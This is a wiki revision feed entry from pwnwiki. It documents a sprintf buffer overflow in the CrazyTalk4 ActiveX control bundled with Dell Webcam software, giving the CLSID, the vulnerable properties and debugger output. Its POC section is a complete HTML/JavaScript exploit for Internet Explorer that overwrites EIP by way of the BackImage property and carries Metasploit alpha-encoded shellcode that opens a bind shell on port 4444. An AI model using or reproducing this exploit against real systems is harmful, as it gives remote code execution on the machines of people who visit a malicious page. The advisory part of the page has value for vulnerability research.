<?xml version="1.0"?>
<feed xmlns="http://www.w3.org/2005/Atom" xml:lang="chinese">
	<id>https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Dell_Webcam_Software_Bundled_ActiveX_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E</id>
	<title>Dell Webcam Software Bundled ActiveX 遠程緩衝區溢出漏洞 - Revision history</title>
	<link rel="self" type="application/atom+xml" href="https://pwnwiki.com/index.php?action=history&amp;feed=atom&amp;title=Dell_Webcam_Software_Bundled_ActiveX_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E"/>
	<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Dell_Webcam_Software_Bundled_ActiveX_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;action=history"/>
	<updated>2026-04-16T03:21:20Z</updated>
	<subtitle>Revision history for this page on the wiki</subtitle>
	<generator>MediaWiki 1.35.1</generator>
	<entry>
		<id>https://pwnwiki.com/index.php?title=Dell_Webcam_Software_Bundled_ActiveX_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=3274&amp;oldid=prev</id>
		<title>Pwnwiki: Created page with &quot;==INFO== &lt;pre&gt; Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Vulnerability Tested against: Microsoft Windows Vista SP2...&quot;</title>
		<link rel="alternate" type="text/html" href="https://pwnwiki.com/index.php?title=Dell_Webcam_Software_Bundled_ActiveX_%E9%81%A0%E7%A8%8B%E7%B7%A9%E8%A1%9D%E5%8D%80%E6%BA%A2%E5%87%BA%E6%BC%8F%E6%B4%9E&amp;diff=3274&amp;oldid=prev"/>
		<updated>2021-05-26T01:01:06Z</updated>

		<summary type="html">&lt;p&gt;Created page with &amp;quot;==INFO== &amp;lt;pre&amp;gt; Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Vulnerability Tested against: Microsoft Windows Vista SP2...&amp;quot;&lt;/p&gt;
&lt;p&gt;&lt;b&gt;New page&lt;/b&gt;&lt;/p&gt;&lt;div&gt;==INFO==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
Dell Webcam Software Bundled ActiveX Control CrazyTalk4Native.dll&lt;br /&gt;
sprintf Remote Buffer Overflow Vulnerability&lt;br /&gt;
Tested against: Microsoft Windows Vista SP2&lt;br /&gt;
                Microsoft Windows XP SP3&lt;br /&gt;
                Microsoft Windows 2003 R2 SP2&lt;br /&gt;
                Internet Explorer 7/8/9&lt;br /&gt;
download url of a test version:&lt;br /&gt;
http://search.dell.com/results.aspx?c=us&amp;amp;l=en&amp;amp;s=gen&amp;amp;cat=sup&amp;amp;k=Dell+SX2210+monitor&amp;amp;rpp=12&amp;amp;p=1&amp;amp;subcat=dyd&amp;amp;rf=all&amp;amp;nk=f&amp;amp;sort=K&amp;amp;ira=False&amp;amp;~srd=False&amp;amp;ipsys=False&amp;amp;advsrch=False&amp;amp;~ck=anav&lt;br /&gt;
file tested: Dell_SX2210-Monitor_Webcam SW RC1.1_ R230103.exe&lt;br /&gt;
This package contains the Dell Webcam Central software&lt;br /&gt;
developed by Creative Technologies for Dell.&lt;br /&gt;
info:&lt;br /&gt;
http://dell-webcam-central.software.informer.com/&lt;br /&gt;
http://live-cam-avatar-creator.software.informer.com/&lt;br /&gt;
http://www.google.com/search?channel=s&amp;amp;hl=en&amp;amp;biw=1024&amp;amp;bih=581&amp;amp;q=13149882-F480-4F6B-8C6A-0764F75B99ED&lt;br /&gt;
http://www.google.com/search?sclient=psy-ab&amp;amp;hl=en&amp;amp;biw=1024&amp;amp;bih=581&amp;amp;source=hp&amp;amp;q=crazytalk4.ocx&amp;amp;btnG=Search&lt;br /&gt;
http://www.google.com/search?sclient=psy-ab&amp;amp;hl=en&amp;amp;biw=1024&amp;amp;bih=581&amp;amp;source=hp&amp;amp;q=CrazyTalk4Native.dll&amp;amp;btnG=Search&lt;br /&gt;
http://dell-webcam-central.software.informer.com/users/&lt;br /&gt;
http://live-cam-avatar-creator.software.informer.com/users/&lt;br /&gt;
I think this is a very common ActiveX, probably bundled with Dell Notebooks.&lt;br /&gt;
Background:&lt;br /&gt;
The mentioned software carries a third party ActiveX Control&lt;br /&gt;
with the following settings.&lt;br /&gt;
Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx&lt;br /&gt;
ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1&lt;br /&gt;
CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}&lt;br /&gt;
Safe for Scripting (Registry): True&lt;br /&gt;
Safe for Initialization (Registry): True&lt;br /&gt;
This control is marked safe for scripting and safe for initialization,&lt;br /&gt;
then Internet Explorer will allow scripting of this control from remote.&lt;br /&gt;
Vulnerability:&lt;br /&gt;
The 'BackImage' ,'ScriptName', 'ModelName' and 'SRC' properties&lt;br /&gt;
can be used to trigger a buffer overflow condition.&lt;br /&gt;
The crazytalk4.ocx ActiveX control will load the close CrazyTalk4Native.dll&lt;br /&gt;
library and, while constructing a local file path, will call sprintf()&lt;br /&gt;
with an insufficient size.&lt;br /&gt;
Call stack of main thread&lt;br /&gt;
Address    Stack      Procedure / arguments                                                                                             Called from                   Frame&lt;br /&gt;
0012EE24   023D4FAB   msvcrt.sprintf                                                                                                    CrazyTal.023D4FA5&lt;br /&gt;
0012EE28   0012F180     s = 0012F180&lt;br /&gt;
0012EE2C   023F431C     format = &amp;quot;%s%s%s&amp;quot;&lt;br /&gt;
0012EE30   042A2D6C     &amp;lt;%s&amp;gt; = &amp;quot;C:\DOCUME~1\Admin\LOCALS~1\Temp\RLTMP\~RW463\&amp;quot;&lt;br /&gt;
0012EE34   0012EF5C     &amp;lt;%s&amp;gt; = &amp;quot;aaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaaa&lt;br /&gt;
0012EE38   0012EE58     &amp;lt;%s&amp;gt; = &amp;quot;&amp;quot;&lt;br /&gt;
0012F164   023D601D   CrazyTal.023D4F20&lt;br /&gt;
code, CrazyTalk4Native.dll :&lt;br /&gt;
...&lt;br /&gt;
023D4F80   85C0             test eax,eax&lt;br /&gt;
023D4F82   74 38            je short CrazyTal.023D4FBC&lt;br /&gt;
023D4F84   8B9C24 2C030000  mov ebx,dword ptr ss:[esp+32C]&lt;br /&gt;
023D4F8B   8D4424 1C        lea eax,dword ptr ss:[esp+1C]&lt;br /&gt;
023D4F8F   8D8C24 20010000  lea ecx,dword ptr ss:[esp+120]&lt;br /&gt;
023D4F96   50               push eax&lt;br /&gt;
023D4F97   81C6 443B0000    add esi,3B44&lt;br /&gt;
023D4F9D   51               push ecx&lt;br /&gt;
023D4F9E   56               push esi&lt;br /&gt;
023D4F9F   68 1C433F02      push CrazyTal.023F431C                   ; ASCII &amp;quot;%s%s%s&amp;quot;&lt;br /&gt;
023D4FA4   53               push ebx&lt;br /&gt;
023D4FA5   FF15 E4F33E02    call dword ptr ds:[&amp;lt;&amp;amp;MSVCRT.sprintf&amp;gt;]    ; msvcrt.sprintf&lt;br /&gt;
...&lt;br /&gt;
As attachment, proof of concept code which overwrites EIP and SEH.&lt;br /&gt;
Note:&lt;br /&gt;
0:008&amp;gt; lm -vm CrazyTalk4Native&lt;br /&gt;
start    end        module name&lt;br /&gt;
021c0000 0220b000   CrazyTalk4Native   (deferred)&lt;br /&gt;
    Image path: C:\PROGRA~1\COMMON~1\REALLU~1\CTPLAY~1\CrazyTalk4Native.dll&lt;br /&gt;
    Image name: CrazyTalk4Native.dll&lt;br /&gt;
    Timestamp:        Thu May 17 12:13:42 2007 (464C2AD6)&lt;br /&gt;
    CheckSum:         00048AB2&lt;br /&gt;
    ImageSize:        0004B000&lt;br /&gt;
    File version:     4.5.815.1&lt;br /&gt;
    Product version:  4.0.0.1&lt;br /&gt;
    File flags:       0 (Mask 3F)&lt;br /&gt;
    File OS:          4 Unknown Win32&lt;br /&gt;
    File type:        2.0 Dll&lt;br /&gt;
    File date:        00000000.00000000&lt;br /&gt;
    Translations:     0409.04b0&lt;br /&gt;
    CompanyName:      C3D&lt;br /&gt;
    ProductName:      CrazyTalk4 ActiveX Control Module&lt;br /&gt;
    InternalName:     CrazyTalk4&lt;br /&gt;
    OriginalFilename: CrazyTalk4.OCX&lt;br /&gt;
    ProductVersion:   4, 0, 0, 1&lt;br /&gt;
    FileVersion:      4, 5, 815, 1&lt;br /&gt;
    PrivateBuild:     4, 5, 815, 1&lt;br /&gt;
    SpecialBuild:     4, 5, 815, 1&lt;br /&gt;
    FileDescription:  CrazyTalk4 Native Control Module&lt;br /&gt;
    LegalCopyright:   Copyright (C) 2005&lt;br /&gt;
    LegalTrademarks:  Copyright (C) 2005&lt;br /&gt;
    Comments:         Copyright (C) 2005&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;br /&gt;
&lt;br /&gt;
==POC==&lt;br /&gt;
&amp;lt;pre&amp;gt;&lt;br /&gt;
&amp;lt;!--&lt;br /&gt;
Dell Camera Software ActiveX Control CrazyTalk4Native.dll sprintf Remote Buffer Overflow Exploit&lt;br /&gt;
bind shell, IE-NO-DEP&lt;br /&gt;
Binary path: C:\Program Files\Common Files\Reallusion\CT Player\crazytalk4.ocx&lt;br /&gt;
ProgID: CRAZYTALK4.CrazyTalk4Ctrl.1&lt;br /&gt;
CLSID: {13149882-F480-4F6B-8C6A-0764F75B99ED}&lt;br /&gt;
Safe for Scripting (Registry): True&lt;br /&gt;
Safe for Initialization (Registry): True&lt;br /&gt;
--&amp;gt;&lt;br /&gt;
&amp;lt;!-- saved from url=(0014)about :internet --&amp;gt;&lt;br /&gt;
&amp;lt;html&amp;gt;&lt;br /&gt;
&amp;lt;object classid='clsid:13149882-F480-4F6B-8C6A-0764F75B99ED' id='obj' width=100; height=100; /&amp;gt;&lt;br /&gt;
&amp;lt;/object&amp;gt;&lt;br /&gt;
&amp;lt;script&amp;gt;&lt;br /&gt;
//bad chars:&lt;br /&gt;
//\x80,\x82-\x8c,\x8e,\x91-\x9c,\x9e-\x9f&lt;br /&gt;
var x=&amp;quot;&amp;quot;;&lt;br /&gt;
for (i=0; i&amp;lt;216; i++){x = x + &amp;quot;A&amp;quot;;}&lt;br /&gt;
x = x + &amp;quot;\x50\x24\x40\x77&amp;quot;;//0x77402450      jmp EBP, user32.dll - change for your need&lt;br /&gt;
for (i=0; i&amp;lt;140; i++){x = x + &amp;quot;A&amp;quot;;}&lt;br /&gt;
// windows/shell_bind_tcp - 696 bytes&lt;br /&gt;
// http://www.metasploit.com&lt;br /&gt;
// Encoder: x86/alpha_mixed&lt;br /&gt;
// EXITFUNC=seh, LPORT=4444, RHOST=&lt;br /&gt;
x = x + &amp;quot;‰åÚÐÙuô^VYIIIIIIIIIICCCCCC7QZjAXP0A0AkAAQ2AB2BB0BBABXP8ABuJIKLCZJKPMM8KIKOKOKOE0LKBLFDQ4LKG5GLLKCLC5CHC1JOLKPOB8LKQOGPC1JKQYLKFTLKC1JNP1IPJ9NLMTIPCDEWIQIZDMC1IRJKL4GKPTQ4FHCEKULKQOGTEQJKBFLKDLPKLKQOELC1JKESFLLKK9BLGTELE1HCFQIKE4LKPCP0LKQPDLLKD0ELNMLKQPC8QNE8LNPNDNJLPPKOHVE6PSCVE8P3FRE8D7CCGBQOQDKON0E8HKJMKLGKPPKOIFQOLIJEE6K1JMC8C2QEBJERKOHPE8N9DIKENMF7KOHVPSF3QCQCF3QSF3QSF3KON0E6E8B1QLE6F3K9M1J5BHNDDZBPIWQGKOIFCZDPPQQEKOHPBHI4NMFNM9QGKOHVQCQEKOHPBHM5QYK6QYPWKON6F0PTF4QEKON0LSE8M7CIHFD9PWKON6F5KON0CVBJCTBFCXE3BMMYM5CZF0QIGYHLK9M7CZPDMYKRP1IPL3NJKNG2FMKNG2FLLSLMCJFXNKNKNKCXBRKNH3DVKOD5G4KOHVQKQGF2F1PQPQBJEQPQPQQEPQKON0BHNMIIC5HNQCKOIFCZKOKOP7KON0LKF7KLMSHDE4KON6PRKON0BHJPMZDDQOPSKON6KOHPAA&amp;quot;;&lt;br /&gt;
try{&lt;br /&gt;
    obj.BackImage = x;&lt;br /&gt;
}catch(e){&lt;br /&gt;
}&lt;br /&gt;
&amp;lt;/script&amp;gt;&lt;br /&gt;
&amp;lt;/pre&amp;gt;&lt;/div&gt;</summary>
		<author><name>Pwnwiki</name></author>
	</entry>
</feed>